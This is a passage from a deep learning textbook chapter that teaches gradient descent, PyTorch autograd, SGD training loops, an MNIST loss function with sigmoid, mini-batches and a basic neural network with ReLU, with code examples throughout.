weights based on that calculation. 1. Go back to the step 2, and *repeat* the process. 1. Iterate until you decide to *stop* the training process (for instance, because the model is good enough or you don't want to wait any longer). These seven steps, illustrated in <<gradient_descent>>, are the key to the training of all deep learning models. That deep learning turns out to rely entirely on these steps is extremely surprising and counterintuitive. It's amazing that this process can solve such complex problems. But, as you'll see, it really does! ``` #id gradient_descent #caption The gradient descent process #alt Graph showing the steps for Gradient Descent gv(''' init->predict->loss->gradient->step->stop step->predict[label=repeat] ''') ``` There are many different ways to do each of these seven steps, and we will be learning about them throughout the rest of this book. These are the details that make a big difference for deep learning practitioners, but it turns out that the general approach to each one generally follows some basic principles. Here are a few guidelines: - Initialize:: We initialize the parameters to random values. This may sound surprising. There are certainly other choices we could make, such as initializing them to the percentage of times that pixel is activated for that category—but since we already know that we have a routine to improve these weights, it turns out that just starting with random weights works perfectly well. - Loss:: This is what Samuel referred to when he spoke of *testing the effectiveness of any current weight assignment in terms of actual performance*. We need some function that will return a number that is small if the performance of the model is good (the standard approach is to treat a small loss as good, and a large loss as bad, although this is just a convention). - Step:: A simple way to figure out whether a weight should be increased a bit, or decreased a bit, would be just to try it: increase the weight by a small amount, and see if the loss goes up or down. Once you find the correct direction, you could then change that amount by a bit more, and a bit less, until you find an amount that works well. However, this is slow! As we will see, the magic of calculus allows us to directly figure out in which direction, and by roughly how much, to change each weight, without having to try all these small changes. The way to do this is by calculating *gradients*. This is just a performance optimization, we would get exactly the same results by using the slower manual process as well. - Stop:: Once we've decided how many epochs to train the model for (a few suggestions for this were given in the earlier list), we apply that decision. This is where that decision is applied. For our digit classifier, we would keep training until the accuracy of the model started getting worse, or we ran out of time. Before applying these steps to our image classification problem, let's illustrate what they look like in a simpler case. First we will define a very simple function, the quadratic—let's pretend that this is our loss function, and `x` is a weight parameter of the function: ``` def f(x): return x**2 ``` Here is a graph of that function: ``` plot_function(f, 'x', 'x**2') ``` The sequence of steps we described earlier starts by picking some random value for a parameter, and calculating the value of the loss: ``` plot_function(f, 'x', 'x**2') plt.scatter(-1.5, f(-1.5), color='red'); ``` Now we look to see what would happen if we increased or decreased our parameter by a little bit—the *adjustment*. This is simply the slope at a particular point: <img alt="A graph showing the squared function with the slope at one point" width="400" src="images/grad_illustration.svg"/> We can change our weight by a little in the direction of the slope, calculate our loss and adjustment again, and repeat this a few times. Eventually, we will get to the lowest point on our curve: <img alt="An illustration of gradient descent" width="400" src="images/chapter2_perfect.svg"/> This basic idea goes all the way back to Isaac Newton, who pointed out that we can optimize arbitrary functions in this way. Regardless of how complicated our functions become, this basic approach of gradient descent will not significantly change. The only minor changes we will see later in this book are some handy ways we can make it faster, by finding better steps. ### Calculating Gradients The one magic step is the bit where we calculate the gradients. As we mentioned, we use calculus as a performance optimization; it allows us to more quickly calculate whether our loss will go up or down when we adjust our parameters up or down. In other words, the gradients will tell us how much we have to change each weight to make our model better. You may remember from your high school calculus class that the *derivative* of a function tells you how much a change in its parameterss will change its result. If not, don't worry, lots of us forget calculus once high school is behind us! But you will have to have some intuitive understanding of what a derivative is before you continue, so if this is all very fuzzy in your head, head over to Khan Academy and complete the [lessons on basic derivatives](https://www.khanacademy.org/math/differential-calculus/dc-diff-intro). You won't have to know how to calculate them yourselves, you just have to know what a derivative is. The key point about a derivative is this: for any function, such as the quadratic function we saw in the previous section, we can calculate its derivative. The derivative is another function. It calculates the change, rather than the value. For instance, the derivative of the quadratic function at the value 3 tells us how rapidly the function changes at the value 3. More specifically, you may recall that gradient is defined as *rise/run*, that is, the change in the value of the function, divided by the change in the value of the parameter. When we know how our function will change, then we know what we need to do to make it smaller. This is the key to machine learning: having a way to change the parameters of a function to make it smaller. Calculus provides us with a computational shortcut, the derivative, which lets us directly calculate the gradients of our functions. One important thing to be aware of is that our function has lots of weights that we need to adjust, so when we calculate the derivative we won't get back one number, but lots of them—a gradient for every weight. But there is nothing mathematically tricky here; you can calculate the derivative with respect to one weight, and treat all the other ones as constant, then repeat that for each other weight. This is how all of the gradients are calculated, for every weight. We mentioned just now that you won't have to calculate any gradients yourself. How can that be? Amazingly enough, PyTorch is able to automatically compute the derivative of nearly any function! What's more, it does it very fast. Most of the time, it will be at least as fast as any derivative function that you can create by hand. Let's see an example. First, let's pick a tensor value which we want gradients at: ``` xt = tensor(3.).requires_grad_() ``` Notice the special method `requires_grad_`? That's the magical incantation we use to tell PyTorch that we want to calculate gradients with respect to that variable at that value. It is essentially tagging the variable, so PyTorch will remember to keep track of how to compute gradients of the other, direct calculations on it that you will ask for. > a: This API might throw you off if you're coming from math or physics. In those contexts the "gradient" of a function is just another function (i.e., its derivative), so you might expect gradient-related APIs to give you a new function. But in deep learning, "gradients" usually means the _value_ of a function's derivative at a particular argument value. The PyTorch API also puts the focus on the argument, not the function you're actually computing the gradients of. It may feel backwards at first, but it's just a different perspective. Now we calculate our function with that value. Notice how PyTorch prints not just the value calculated, but also a note that it has a gradient function it'll be using to calculate our gradients when needed: ``` yt = f(xt) yt ``` Finally, we tell PyTorch to calculate the gradients for us: ``` yt.backward() ``` The "backward" here refers to *backpropagation*, which is the name given to the process of calculating the derivative of each layer. We'll see how this is done exactly in chapter <<chapter_foundations>>, when we calculate the gradients of a deep neural net from scratch. This is called the "backward pass" of the network, as opposed to the "forward pass," which is where the activations are calculated. Life would probably be easier if `backward` was just called `calculate_grad`, but deep learning folks really do like to add jargon everywhere they can! We can now view the gradients by checking the `grad` attribute of our tensor: ``` xt.grad ``` If you remember your high school calculus rules, the derivative of `x**2` is `2*x`, and we have `x=3`, so the gradients should be `2*3=6`, which is what PyTorch calculated for us! Now we'll repeat the preceding steps, but with a vector argument for our function: ``` xt = tensor([3.,4.,10.]).requires_grad_() xt ``` And we'll add `sum` to our function so it can take a vector (i.e., a rank-1 tensor), and return a scalar (i.e., a rank-0 tensor): ``` def f(x): return (x**2).sum() yt = f(xt) yt ``` Our gradients are `2*xt`, as we'd expect! ``` yt.backward() xt.grad ``` The gradients only tell us the slope of our function, they don't actually tell us exactly how far to adjust the parameters. But it gives us some idea of how far; if the slope is very large, then that may suggest that we have more adjustments to do, whereas if the slope is very small, that may suggest that we are close to the optimal value. ### Stepping With a Learning Rate Deciding how to change our parameters based on the values of the gradients is an important part of the deep learning process. Nearly all approaches start with the basic idea of multiplying the gradient by some small number, called the *learning rate* (LR). The learning rate is often a number between 0.001 and 0.1, although it could be anything. Often, people select a learning rate just by trying a few, and finding which results in the best model after training (we'll show you a better approach later in this book, called the *learning rate finder*). Once you've picked a learning rate, you can adjust your parameters using this simple function: ``` w -= gradient(w) * lr ``` This is known as *stepping* your parameters, using an *optimizer step*. If you pick a learning rate that's too low, it can mean having to do a lot of steps. <<descent_small>> illustrates that. <img alt="An illustration of gradient descent with a LR too low" width="400" caption="Gradient descent with low LR" src="images/chapter2_small.svg" id="descent_small"/> But picking a learning rate that's too high is even worse—it can actually result in the loss getting *worse*, as we see in <<descent_div>>! <img alt="An illustration of gradient descent with a LR too high" width="400" caption="Gradient descent with high LR" src="images/chapter2_div.svg" id="descent_div"/> If the learning rate is too high, it may also "bounce" around, rather than actually diverging; <<descent_bouncy>> shows how this has the result of taking many steps to train successfully. <img alt="An illustation of gradient descent with a bouncy LR" width="400" caption="Gradient descent with bouncy LR" src="images/chapter2_bouncy.svg" id="descent_bouncy"/> Now let's apply all of this in an end-to-end example. ### An End-to-End SGD Example We've seen how to use gradients to find a minimum. Now it's time to look at an SGD example and see how finding a minimum can be used to train a model to fit data better. Let's start with a simple, synthetic, example model. Imagine you were measuring the speed of a roller coaster as it went over the top of a hump. It would start fast, and then get slower as it went up the hill; it would be slowest at the top, and it would then speed up again as it went downhill. You want to build a model of how the speed changes over time. If you were measuring the speed manually every second for 20 seconds, it might look something like this: ``` time = torch.arange(0,20).float(); time speed = torch.randn(20)*3 + 0.75*(time-9.5)**2 + 1 plt.scatter(time,speed); ``` We've added a bit of random noise, since measuring things manually isn't precise. This means it's not that easy to answer the question: what was the roller coaster's speed? Using SGD we can try to find a function that matches our observations. We can't consider every possible function, so let's use a guess that it will be quadratic; i.e., a function of the form `a*(time**2)+(b*time)+c`. We want to distinguish clearly between the function's input (the time when we are measuring the coaster's speed) and its parameters (the values that define *which* quadratic we're trying). So, let's collect the parameters in one argument and thus separate the input, `t`, and the parameters, `params`, in the function's signature: ``` def f(t, params): a,b,c = params return a*(t**2) + (b*t) + c ``` In other words, we've restricted the problem of finding the best imaginable function that fits the data, to finding the best *quadratic* function. This greatly simplifies the problem, since every quadratic function is fully defined by the three parameters `a`, `b`, and `c`. Thus, to find the best quadratic function, we only need to find the best values for `a`, `b`, and `c`. If we can solve this problem for the three parameters of a quadratic function, we'll be able to apply the same approach for other, more complex functions with more parameters—such as a neural net. Let's find the parameters for `f` first, and then we'll come back and do the same thing for the MNIST dataset with a neural net. We need to define first what we mean by "best." We define this precisely by choosing a *loss function*, which will return a value based on a prediction and a target, where lower values of the function correspond to "better" predictions. For continuous data, it's common to use *mean squared error*: ``` def mse(preds, targets): return ((preds-targets)**2).mean() ``` Now, let's work through our 7 step process. #### Step 1: Initialize the parameters First, we initialize the parameters to random values, and tell PyTorch that we want to track their gradients, using `requires_grad_`: ``` params = torch.randn(3).requires_grad_() #hide orig_params = params.clone() ``` #### Step 2: Calculate the predictions Next, we calculate the predictions: ``` preds = f(time, params) ``` Let's create a little function to see how close our predictions are to our targets, and take a look: ``` def show_preds(preds, ax=None): if ax is None: ax=plt.subplots()[1] ax.scatter(time, speed) ax.scatter(time, to_np(preds), color='red') ax.set_ylim(-300,100) show_preds(preds) ``` This doesn't look very close—our random parameters suggest that the roller coaster will end up going backwards, since we have negative speeds! #### Step 3: Calculate the loss We calculate the loss as follows: ``` loss = mse(preds, speed) loss ``` Our goal is now to improve this. To do that, we'll need to know the gradients. #### Step 4: Calculate the gradients The next step is to calculate the gradients. In other words, calculate an approximation of how the parameters need to change: ``` loss.backward() params.grad params.grad * 1e-5 ``` We can use these gradients to improve our parameters. We'll need to pick a learning rate (we'll discuss how to do that in practice in the next chapter; for now we'll just use 1e-5, or 0.00001): ``` params ``` #### Step 5: Step the weights. Now we need to update the parameters based on the gradients we just calculated: ``` lr = 1e-5 params.data -= lr * params.grad.data params.grad = None ``` > a: Understanding this bit depends on remembering recent history. To calculate the gradients we call `backward` on the `loss`. But this `loss` was itself calculated by `mse`, which in turn took `preds` as an input, which was calculated using `f` taking as an input `params`, which was the object on which we originally called `required_grads_`—which is the original call that now allows us to call `backward` on `loss`. This chain of function calls represents the mathematical composition of functions, which enables PyTorch to use calculus's chain rule under the hood to calculate these gradients. Let's see if the loss has improved: ``` preds = f(time,params) mse(preds, speed) ``` And take a look at the plot: ``` show_preds(preds) ``` We need to repeat this a few times, so we'll create a function to apply one step: ``` def apply_step(params, prn=True): preds = f(time, params) loss = mse(preds, speed) loss.backward() params.data -= lr * params.grad.data params.grad = None if prn: print(loss.item()) return preds ``` #### Step 6: Repeat the process Now we iterate. By looping and performing many improvements, we hope to reach a good result: ``` for i in range(10): apply_step(params) #hide params = orig_params.detach().requires_grad_() ``` The loss is going down, just as we hoped! But looking only at these loss numbers disguises the fact that each iteration represents an entirely different quadratic function being tried, on the way to finding the best possible quadratic function. We can see this process visually if, instead of printing out the loss function, we plot the function at every step. Then we can see how the shape is approaching the best possible quadratic function for our data: ``` _,axs = plt.subplots(1,4,figsize=(12,3)) for ax in axs: show_preds(apply_step(params, False), ax) plt.tight_layout() ``` #### Step 7: stop We just decided to stop after 10 epochs arbitrarily. In practice, we would watch the training and validation losses and our metrics to decide when to stop, as we've discussed. ### Summarizing Gradient Descent ``` #hide_input #id gradient_descent #caption The gradient descent process #alt Graph showing the steps for Gradient Descent gv(''' init->predict->loss->gradient->step->stop step->predict[label=repeat] ''') ``` To summarize, at the beginning, the weights of our model can be random (training *from scratch*) or come from a pretrained model (*transfer learning*). In the first case, the output we will get from our inputs won't have anything to do with what we want, and even in the second case, it's very likely the pretrained model won't be very good at the specific task we are targeting. So the model will need to *learn* better weights. We begin by comparing the outputs the model gives us with our targets (we have labeled data, so we know what result the model should give) using a *loss function*, which returns a number that we want to make as low as possible by improving our weights. To do this, we take a few data items (such as images) from the training set and feed them to our model. We compare the corresponding targets using our loss function, and the score we get tells us how wrong our predictions were. We then change the weights a little bit to make it slightly better. To find how to change the weights to make the loss a bit better, we use calculus to calculate the *gradients*. (Actually, we let PyTorch do it for us!) Let's consider an analogy. Imagine you are lost in the mountains with your car parked at the lowest point. To find your way back to it, you might wander in a random direction, but that probably wouldn't help much. Since you know your vehicle is at the lowest point, you would be better off going downhill. By always taking a step in the direction of the steepest downward slope, you should eventually arrive at your destination. We use the magnitude of the gradient (i.e., the steepness of the slope) to tell us how big a step to take; specifically, we multiply the gradient by a number we choose called the *learning rate* to decide on the step size. We then *iterate* until we have reached the lowest point, which will be our parking lot, then we can *stop*. All of that we just saw can be transposed directly to the MNIST dataset, except for the loss function. Let's now see how we can define a good training objective. ## The MNIST Loss Function We already have our dependent variables `x`—these are the images themselves. We'll concatenate them all into a single tensor, and also change them from a list of matrices (a rank-3 tensor) to a list of vectors (a rank-2 tensor). We can do this using `view`, which is a PyTorch method that changes the shape of a tensor without changing its contents. `-1` is a special parameter to `view` that means "make this axis as big as necessary to fit all the data": ``` train_x = torch.cat([stacked_threes, stacked_sevens]).view(-1, 28*28) ``` We need a label for each image. We'll use `1` for 3s and `0` for 7s: ``` train_y = tensor([1]*len(threes) + [0]*len(sevens)).unsqueeze(1) train_x.shape,train_y.shape ``` A `Dataset` in PyTorch is required to return a tuple of `(x,y)` when indexed. Python provides a `zip` function which, when combined with `list`, provides a simple way to get this functionality: ``` dset = list(zip(train_x,train_y)) x,y = dset[0] x.shape,y valid_x = torch.cat([valid_3_tens, valid_7_tens]).view(-1, 28*28) valid_y = tensor([1]*len(valid_3_tens) + [0]*len(valid_7_tens)).unsqueeze(1) valid_dset = list(zip(valid_x,valid_y)) ``` Now we need an (initially random) weight for every pixel (this is the *initialize* step in our seven-step process): ``` def init_params(size, std=1.0): return (torch.randn(size)*std).requires_grad_() weights = init_params((28*28,1)) ``` The function `weights*pixels` won't be flexible enough—it is always equal to 0 when the pixels are equal to 0 (i.e., its *intercept* is 0). You might remember from high school math that the formula for a line is `y=w*x+b`; we still need the `b`. We'll initialize it to a random number too: ``` bias = init_params(1) ``` In neural networks, the `w` in the equation `y=w*x+b` is called the *weights*, and the `b` is called the *bias*. Together, the weights and bias make up the *parameters*. > jargon: Parameters: The _weights_ and _biases_ of a model. The weights are the `w` in the equation `w*x+b`, and the biases are the `b` in that equation. We can now calculate a prediction for one image: ``` (train_x[0]*weights.T).sum() + bias ``` While we could use a Python `for` loop to calculate the prediction for each image, that would be very slow. Because Python loops don't run on the GPU, and because Python is a slow language for loops in general, we need to represent as much of the computation in a model as possible using higher-level functions. In this case, there's an extremely convenient mathematical operation that calculates `w*x` for every row of a matrix—it's called *matrix multiplication*. <<matmul>> shows what matrix multiplication looks like. <img alt="Matrix multiplication" width="400" caption="Matrix multiplication" src="images/matmul2.svg" id="matmul"/> This image shows two matrices, `A` and `B`, being multiplied together. Each item of the result, which we'll call `AB`, contains each item of its corresponding row of `A` multiplied by each item of its corresponding column of `B`, added together. For instance, row 1, column 2 (the orange dot with a red border) is calculated as $a_{1,1} * b_{1,2} + a_{1,2} * b_{2,2}$. If you need a refresher on matrix multiplication, we suggest you take a look at the [Intro to Matrix Multiplication](https://youtu.be/kT4Mp9EdVqs) on *Khan Academy*, since this is the most important mathematical operation in deep learning. In Python, matrix multiplication is represented with the `@` operator. Let's try it: ``` def linear1(xb): return xb@weights + bias preds = linear1(train_x) preds ``` The first element is the same as we calculated before, as we'd expect. This equation, `batch@weights + bias`, is one of the two fundamental equations of any neural network (the other one is the *activation function*, which we'll see in a moment). Let's check our accuracy. To decide if an output represents a 3 or a 7, we can just check whether it's greater than 0, so our accuracy for each item can be calculated (using broadcasting, so no loops!) with: ``` corrects = (preds>0.0).float() == train_y corrects corrects.float().mean().item() ``` Now let's see what the change in accuracy is for a small change in one of the weights: ``` weights[0] *= 1.0001 preds = linear1(train_x) ((preds>0.0).float() == train_y).float().mean().item() ``` As we've seen, we need gradients in order to improve our model using SGD, and in order to calculate gradients we need some *loss function* that represents how good our model is. That is because the gradients are a measure of how that loss function changes with small tweaks to the weights. So, we need to choose a loss function. The obvious approach would be to use accuracy, which is our metric, as our loss function as well. In this case, we would calculate our prediction for each image, collect these values to calculate an overall accuracy, and then calculate the gradients of each weight with respect to that overall accuracy. Unfortunately, we have a significant technical problem here. The gradient of a function is its *slope*, or its steepness, which can be defined as *rise over run*—that is, how much the value of the function goes up or down, divided by how much we changed the input. We can write this in mathematically as: `(y_new - y_old) / (x_new - x_old)`. This gives us a good approximation of the gradient when `x_new` is very similar to `x_old`, meaning that their difference is very small. But accuracy only changes at all when a prediction changes from a 3 to a 7, or vice versa. The problem is that a small change in weights from `x_old` to `x_new` isn't likely to cause any prediction to change, so `(y_new - y_old)` will almost always be 0. In other words, the gradient is 0 almost everywhere. A very small change in the value of a weight will often not actually change the accuracy at all. This means it is not useful to use accuracy as a loss function—if we do, most of the time our gradients will actually be 0, and the model will not be able to learn from that number. > S: In mathematical terms, accuracy is a function that is constant almost everywhere (except at the threshold, 0.5), so its derivative is nil almost everywhere (and infinity at the threshold). This then gives gradients that are 0 or infinite, which are useless for updating the model. Instead, we need a loss function which, when our weights result in slightly better predictions, gives us a slightly better loss. So what does a "slightly better prediction" look like, exactly? Well, in this case, it means that if the correct answer is a 3 the score is a little higher, or if the correct answer is a 7 the score is a little lower. Let's write such a function now. What form does it take? The loss function receives not the images themselves, but the predictions from the model. Let's make one argument, `prds`, of values between 0 and 1, where each value is the prediction that an image is a 3. It is a vector (i.e., a rank-1 tensor), indexed over the images. The purpose of the loss function is to measure the difference between predicted values and the true values — that is, the targets (aka labels). Let's make another argument, `trgts`, with values of 0 or 1 which tells whether an image actually is a 3 or not. It is also a vector (i.e., another rank-1 tensor), indexed over the images. So, for instance, suppose we had three images which we knew were a 3, a 7, and a 3. And suppose our model predicted with high confidence (`0.9`) that the first was a 3, with slight confidence (`0.4`) that the second was a 7, and with fair confidence (`0.2`), but incorrectly, that the last was a 7. This would mean our loss function would receive these values as its inputs: ``` trgts = tensor([1,0,1]) prds = tensor([0.9, 0.4, 0.2]) ``` Here's a first try at a loss function that measures the distance between `predictions` and `targets`: ``` def mnist_loss(predictions, targets): return torch.where(targets==1, 1-predictions, predictions).mean() ``` We're using a new function, `torch.where(a,b,c)`. This is the same as running the list comprehension `[b[i] if a[i] else c[i] for i in range(len(a))]`, except it works on tensors, at C/CUDA speed. In plain English, this function will measure how distant each prediction is from 1 if it should be 1, and how distant it is from 0 if it should be 0, and then it will take the mean of all those distances. > note: Read the Docs: It's important to learn about PyTorch functions like this, because looping over tensors in Python performs at Python speed, not C/CUDA speed! Try running `help(torch.where)` now to read the docs for this function, or, better still, look it up on the PyTorch documentation site. Let's try it on our `prds` and `trgts`: ``` torch.where(trgts==1, 1-prds, prds) ``` You can see that this function returns a lower number when predictions are more accurate, when accurate predictions are more confident (higher absolute values), and when inaccurate predictions are less confident. In PyTorch, we always assume that a lower value of a loss function is better. Since we need a scalar for the final loss, `mnist_loss` takes the mean of the previous tensor: ``` mnist_loss(prds,trgts) ``` For instance, if we change our prediction for the one "false" target from `0.2` to `0.8` the loss will go down, indicating that this is a better prediction: ``` mnist_loss(tensor([0.9, 0.4, 0.8]),trgts) ``` One problem with `mnist_loss` as currently defined is that it assumes that predictions are always between 0 and 1. We need to ensure, then, that this is actually the case! As it happens, there is a function that does exactly that—let's take a look. ### Sigmoid The `sigmoid` function always outputs a number between 0 and 1. It's defined as follows: ``` def sigmoid(x): return 1/(1+torch.exp(-x)) ``` Pytorch defines an accelerated version for us, so we don’t really need our own. This is an important function in deep learning, since we often want to ensure values are between 0 and 1. This is what it looks like: ``` plot_function(torch.sigmoid, title='Sigmoid', min=-4, max=4) ``` As you can see, it takes any input value, positive or negative, and smooshes it onto an output value between 0 and 1. It's also a smooth curve that only goes up, which makes it easier for SGD to find meaningful gradients. Let's update `mnist_loss` to first apply `sigmoid` to the inputs: ``` def mnist_loss(predictions, targets): predictions = predictions.sigmoid() return torch.where(targets==1, 1-predictions, predictions).mean() ``` Now we can be confident our loss function will work, even if the predictions are not between 0 and 1. All that is required is that a higher prediction corresponds to higher confidence an image is a 3. Having defined a loss function, now is a good moment to recapitulate why we did this. After all, we already had a metric, which was overall accuracy. So why did we define a loss? The key difference is that the metric is to drive human understanding and the loss is to drive automated learning. To drive automated learning, the loss must be a function that has a meaningful derivative. It can't have big flat sections and large jumps, but instead must be reasonably smooth. This is why we designed a loss function that would respond to small changes in confidence level. This requirement means that sometimes it does not really reflect exactly what we are trying to achieve, but is rather a compromise between our real goal, and a function that can be optimized using its gradient. The loss function is calculated for each item in our dataset, and then at the end of an epoch the loss values are all averaged and the overall mean is reported for the epoch. Metrics, on the other hand, are the numbers that we really care about. These are the values that are printed at the end of each epoch that tell us how our model is really doing. It is important that we learn to focus on these metrics, rather than the loss, when judging the performance of a model. ### SGD and Mini-Batches Now that we have a loss function that is suitable for driving SGD, we can consider some of the details involved in the next phase of the learning process, which is to change or update the weights based on the gradients. This is called an *optimization step*. In order to take an optimization step we need to calculate the loss over one or more data items. How many should we use? We could calculate it for the whole dataset, and take the average, or we could calculate it for a single data item. But neither of these is ideal. Calculating it for the whole dataset would take a very long time. Calculating it for a single item would not use much information, so it would result in a very imprecise and unstable gradient. That is, you'd be going to the trouble of updating the weights, but taking into account only how that would improve the model's performance on that single item. So instead we take a compromise between the two: we calculate the average loss for a few data items at a time. This is called a *mini-batch*. The number of data items in the mini-batch is called the *batch size*. A larger batch size means that you will get a more accurate and stable estimate of your dataset's gradients from the loss function, but it will take longer, and you will process fewer mini-batches per epoch. Choosing a good batch size is one of the decisions you need to make as a deep learning practitioner to train your model quickly and accurately. We will talk about how to make this choice throughout this book. Another good reason for using mini-batches rather than calculating the gradient on individual data items is that, in practice, we nearly always do our training on an accelerator such as a GPU. These accelerators only perform well if they have lots of work to do at a time, so it's helpful if we can give them lots of data items to work on. Using mini-batches is one of the best ways to do this. However, if you give them too much data to work on at once, they run out of memory—making GPUs happy is also tricky! As we saw in our discussion of data augmentation in <<chapter_production>>, we get better generalization if we can vary things during training. One simple and effective thing we can vary is what data items we put in each mini-batch. Rather than simply enumerating our dataset in order for every epoch, instead what we normally do is randomly shuffle it on every epoch, before we create mini-batches. PyTorch and fastai provide a class that will do the shuffling and mini-batch collation for you, called `DataLoader`. A `DataLoader` can take any Python collection and turn it into an iterator over many batches, like so: ``` coll = range(15) dl = DataLoader(coll, batch_size=5, shuffle=True) list(dl) ``` For training a model, we don't just want any Python collection, but a collection containing independent and dependent variables (that is, the inputs and targets of the model). A collection that contains tuples of independent and dependent variables is known in PyTorch as a `Dataset`. Here's an example of an extremely simple `Dataset`: ``` ds = L(enumerate(string.ascii_lowercase)) ds ``` When we pass a `Dataset` to a `DataLoader` we will get back many batches which are themselves tuples of tensors representing batches of independent and dependent variables: ``` dl = DataLoader(ds, batch_size=6, shuffle=True) list(dl) ``` We are now ready to write our first training loop for a model using SGD! ## Putting It All Together It's time to implement the process we saw in <<gradient_descent>>. In code, our process will be implemented something like this for each epoch: ```python for x,y in dl: pred = model(x) loss = loss_func(pred, y) loss.backward() parameters -= parameters.grad * lr ``` First, let's re-initialize our parameters: ``` weights = init_params((28*28,1)) bias = init_params(1) ``` A `DataLoader` can be created from a `Dataset`: ``` dl = DataLoader(dset, batch_size=256) xb,yb = first(dl) xb.shape,yb.shape ``` We'll do the same for the validation set: ``` valid_dl = DataLoader(valid_dset, batch_size=256) ``` Let's create a mini-batch of size 4 for testing: ``` batch = train_x[:4] batch.shape preds = linear1(batch) preds loss = mnist_loss(preds, train_y[:4]) loss ``` Now we can calculate the gradients: ``` loss.backward() weights.grad.shape,weights.grad.mean(),bias.grad ``` Let's put that all in a function: ``` def calc_grad(xb, yb, model): preds = model(xb) loss = mnist_loss(preds, yb) loss.backward() ``` and test it: ``` calc_grad(batch, train_y[:4], linear1) weights.grad.mean(),bias.grad ``` But look what happens if we call it twice: ``` calc_grad(batch, train_y[:4], linear1) weights.grad.mean(),bias.grad ``` The gradients have changed! The reason for this is that `loss.backward` actually *adds* the gradients of `loss` to any gradients that are currently stored. So, we have to set the current gradients to 0 first: ``` weights.grad.zero_() bias.grad.zero_(); ``` > note: Inplace Operations: Methods in PyTorch whose names end in an underscore modify their objects _in place_. For instance, `bias.zero_()` sets all elements of the tensor `bias` to 0. Our only remaining step is to update the weights and biases based on the gradient and learning rate. When we do so, we have to tell PyTorch not to take the gradient of this step too—otherwise things will get very confusing when we try to compute the derivative at the next batch! If we assign to the `data` attribute of a tensor then PyTorch will not take the gradient of that step. Here's our basic training loop for an epoch: ``` def train_epoch(model, lr, params): for xb,yb in dl: calc_grad(xb, yb, model) for p in params: p.data -= p.grad*lr p.grad.zero_() ``` We also want to check how we're doing, by looking at the accuracy of the validation set. To decide if an output represents a 3 or a 7, we can just check whether it's greater than 0. So our accuracy for each item can be calculated (using broadcasting, so no loops!) with: ``` (preds>0.0).float() == train_y[:4] ``` That gives us this function to calculate our validation accuracy: ``` def batch_accuracy(xb, yb): preds = xb.sigmoid() correct = (preds>0.5) == yb return correct.float().mean() ``` We can check it works: ``` batch_accuracy(linear1(batch), train_y[:4]) ``` and then put the batches together: ``` def validate_epoch(model): accs = [batch_accuracy(model(xb), yb) for xb,yb in valid_dl] return round(torch.stack(accs).mean().item(), 4) validate_epoch(linear1) ``` That's our starting point. Let's train for one epoch, and see if the accuracy improves: ``` lr = 1. params = weights,bias train_epoch(linear1, lr, params) validate_epoch(linear1) ``` Then do a few more: ``` for i in range(20): train_epoch(linear1, lr, params) print(validate_epoch(linear1), end=' ') ``` Looking good! We're already about at the same accuracy as our "pixel similarity" approach, and we've created a general-purpose foundation we can build on. Our next step will be to create an object that will handle the SGD step for us. In PyTorch, it's called an *optimizer*. ### Creating an Optimizer Because this is such a general foundation, PyTorch provides some useful classes to make it easier to implement. The first thing we can do is replace our `linear1` function with PyTorch's `nn.Linear` module. A *module* is an object of a class that inherits from the PyTorch `nn.Module` class. Objects of this class behave identically to standard Python functions, in that you can call them using parentheses and they will return the activations of a model. `nn.Linear` does the same thing as our `init_params` and `linear` together. It contains both the *weights* and *biases* in a single class. Here's how we replicate our model from the previous section: ``` linear_model = nn.Linear(28*28,1) ``` Every PyTorch module knows what parameters it has that can be trained; they are available through the `parameters` method: ``` w,b = linear_model.parameters() w.shape,b.shape ``` We can use this information to create an optimizer: ``` class BasicOptim: def __init__(self,params,lr): self.params,self.lr = list(params),lr def step(self, *args, **kwargs): for p in self.params: p.data -= p.grad.data * self.lr def zero_grad(self, *args, **kwargs): for p in self.params: p.grad = None ``` We can create our optimizer by passing in the model's parameters: ``` opt = BasicOptim(linear_model.parameters(), lr) ``` Our training loop can now be simplified to: ``` def train_epoch(model): for xb,yb in dl: calc_grad(xb, yb, model) opt.step() opt.zero_grad() ``` Our validation function doesn't need to change at all: ``` validate_epoch(linear_model) ``` Let's put our little training loop in a function, to make things simpler: ``` def train_model(model, epochs): for i in range(epochs): train_epoch(model) print(validate_epoch(model), end=' ') ``` The results are the same as in the previous section: ``` train_model(linear_model, 20) ``` fastai provides the `SGD` class which, by default, does the same thing as our `BasicOptim`: ``` linear_model = nn.Linear(28*28,1) opt = SGD(linear_model.parameters(), lr) train_model(linear_model, 20) ``` fastai also provides `Learner.fit`, which we can use instead of `train_model`. To create a `Learner` we first need to create a `DataLoaders`, by passing in our training and validation `DataLoader`s: ``` dls = DataLoaders(dl, valid_dl) ``` To create a `Learner` without using an application (such as `cnn_learner`) we need to pass in all the elements that we've created in this chapter: the `DataLoaders`, the model, the optimization function (which will be passed the parameters), the loss function, and optionally any metrics to print: ``` learn = Learner(dls, nn.Linear(28*28,1), opt_func=SGD, loss_func=mnist_loss, metrics=batch_accuracy) ``` Now we can call `fit`: ``` learn.fit(10, lr=lr) ``` As you can see, there's nothing magic about the PyTorch and fastai classes. They are just convenient pre-packaged pieces that make your life a bit easier! (They also provide a lot of extra functionality we'll be using in future chapters.) With these classes, we can now replace our linear model with a neural network. ## Adding a Nonlinearity So far we have a general procedure for optimizing the parameters of a function, and we have tried it out on a very boring function: a simple linear classifier. A linear classifier is very constrained in terms of what it can do. To make it a bit more complex (and able to handle more tasks), we need to add something nonlinear between two linear classifiers—this is what gives us a neural network. Here is the entire definition of a basic neural network: ``` def simple_net(xb): res = xb@w1 + b1 res = res.max(tensor(0.0)) res = res@w2 + b2 return res ``` That's it! All we have in `simple_net` is two linear classifiers with a `max` function between them. Here, `w1` and `w2` are weight tensors, and `b1` and `b2` are bias tensors; that is, parameters that are initially randomly initialized, just like we did in the previous section: ``` w1 = init_params((28*28,30)) b1 = init_params(30) w2 = init_params((30,1)) b2 = init_params(1) ``` The key point about this is that `w1` has 30 output activations (which means that `w2` must have 30 input activations, so they match). That means that the first layer can construct 30 different features, each representing some different mix of pixels. You can change that `30` to anything you like, to make the model more or less complex. That little function `res.max(tensor(0.0))` is called a *rectified linear unit*, also known as *ReLU*. We think we can all agree that *rectified linear unit* sounds pretty fancy and complicated... But actually, there's nothing more to it than `res.max(tensor(0.0))`—in other words, replace every negative number with a zero. This tiny function is also available in PyTorch as `F.relu`: ``` plot_function(F.relu) ``` > J: There is an enormous amount of jargon in deep learning, including terms like _rectified linear unit_. The vast vast majority of this jargon is no more complicated than can be implemented in a short line of code, as we saw in this example. The reality is that for academics to get their papers published they need to make them sound as impressive and sophisticated as possible. One of the ways that they do that is to introduce jargon. Unfortunately, this has the result that the field ends up becoming far more 